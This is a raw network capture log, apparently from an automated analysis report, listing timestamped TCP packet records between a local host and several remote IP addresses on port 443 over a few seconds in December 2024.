                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.561496973 CET49852443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.561516047 CET44349852142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.834928036 CET4434984120.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.835081100 CET49841443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.837232113 CET49841443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.837241888 CET4434984120.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.838032961 CET4434984120.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.845647097 CET49841443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.845673084 CET49841443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.845681906 CET4434984120.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.846573114 CET49841443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.887329102 CET4434984120.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.965773106 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.965867043 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.965945959 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.966200113 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.966233015 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:57.027455091 CET49854443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:57.027479887 CET44349854142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:57.027829885 CET49854443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:57.028045893 CET49854443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:57.028059959 CET44349854142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:57.120893955 CET49855443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:57.120954037 CET44349855142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:57.121064901 CET49855443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:57.121315956 CET49855443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:57.121345043 CET44349855142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:57.416981936 CET4434984120.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:57.417215109 CET4434984120.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:57.417572975 CET49841443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:57.417572975 CET49841443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:57.417613029 CET4434984120.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:57.417733908 CET49841443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.281567097 CET44349852142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.300266027 CET49852443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.300283909 CET44349852142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.303728104 CET44349852142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.303798914 CET49852443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.484313011 CET49852443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.484638929 CET44349852142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.506431103 CET49852443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.506453991 CET44349852142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.557987928 CET49852443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.732355118 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.732630968 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.732672930 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.736129045 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.736192942 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.736556053 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.736633062 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.736757994 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.736776114 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.748613119 CET44349854142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.748810053 CET49854443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.748830080 CET44349854142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.752568007 CET44349854142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.752626896 CET49854443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.752911091 CET49854443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.753065109 CET49854443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.753154039 CET44349854142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.784491062 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.806432009 CET49854443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.806444883 CET44349854142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.847415924 CET49854443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.935827971 CET44349855142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.938232899 CET49855443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.938247919 CET44349855142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.939796925 CET44349855142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.939868927 CET49855443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.940239906 CET49855443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.940346956 CET44349855142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.988069057 CET49855443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:58.988090992 CET44349855142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.034919024 CET49855443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.163851023 CET44349852142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.163917065 CET44349852142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.163969994 CET49852443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.163995981 CET44349852142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.169735909 CET44349852142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.169811010 CET49852443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.169965029 CET49852443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.169986963 CET44349852142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.597961903 CET44349854142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.602889061 CET44349854142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.602942944 CET49854443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.603815079 CET49854443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.603837967 CET44349854142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.623037100 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.623188972 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.623251915 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.623281956 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.623382092 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.623452902 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.623461962 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.631136894 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.631205082 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.631232977 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.644939899 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.645690918 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.645700932 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.671226978 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.671499014 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.671509981 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.722882032 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.742650032 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.785393953 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.785423994 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.819152117 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.819215059 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.819243908 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.828994989 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.829055071 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.829087019 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.841358900 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.841414928 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.841423988 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.862170935 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.862227917 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.862235069 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.876602888 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.876657009 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.876667023 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.893337011 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.893398046 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.893409967 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.909879923 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.910074949 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.910083055 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.924166918 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.924222946 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.924252033 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.939105988 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.939203024 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.939233065 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.951997995 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.952059031 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.952088118 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.974894047 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.974951982 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.974977970 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.986670017 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.986794949 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.986824989 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.008596897 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.008660078 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.008680105 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.011502981 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.011560917 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.011568069 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.015742064 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.015796900 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.015804052 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.024539948 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.024601936 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.024607897 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.035552979 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.035608053 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.035614014 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.043720961 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.043775082 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.043782949 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.053143978 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.053236008 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.053242922 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.063776970 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.063838005 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.063844919 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.072000027 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.072060108 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.072067022 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.081504107 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.081573009 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.081582069 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.090965986 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.091026068 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.091054916 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.100505114 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.100595951 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.100609064 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.110342979 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.110415936 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.110435009 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.119522095 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.119596958 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.119597912 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.119611979 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.119657040 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.129031897 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.138566017 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.138628960 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.138637066 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.151684999 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.151746035 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.151752949 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.157696009 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.157799006 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.157870054 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.157876968 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.158159971 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.167222977 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.182390928 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.182573080 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.182601929 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.185436964 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.185497046 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.185506105 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.190382004 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.190435886 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.190443993 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.195943117 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.196006060 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.196013927 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.201371908 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.201433897 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.201441050 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.206727028 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.206777096 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.206783056 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.212387085 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.212452888 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.212460041 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.219702005 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.219753027 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.219759941 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.226141930 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.226196051 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.226202965 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.228219032 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.228271008 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.228276014 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.235557079 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.235610008 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.235616922 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.238519907 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.238584995 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.238599062 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.238607883 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.238645077 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.238773108 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.238838911 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.239108086 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.239118099 CET44349853142.250.181.68192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.239131927 CET49853443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:01.141239882 CET49874443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:01.141346931 CET44349874188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:01.141443968 CET49874443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:01.141721964 CET49874443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:01.141751051 CET44349874188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:02.308024883 CET49877443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:02.308085918 CET44349877188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:02.308141947 CET49877443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:02.308567047 CET49877443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:02.308584929 CET44349877188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:02.341577053 CET49855443192.168.2.6142.250.181.68
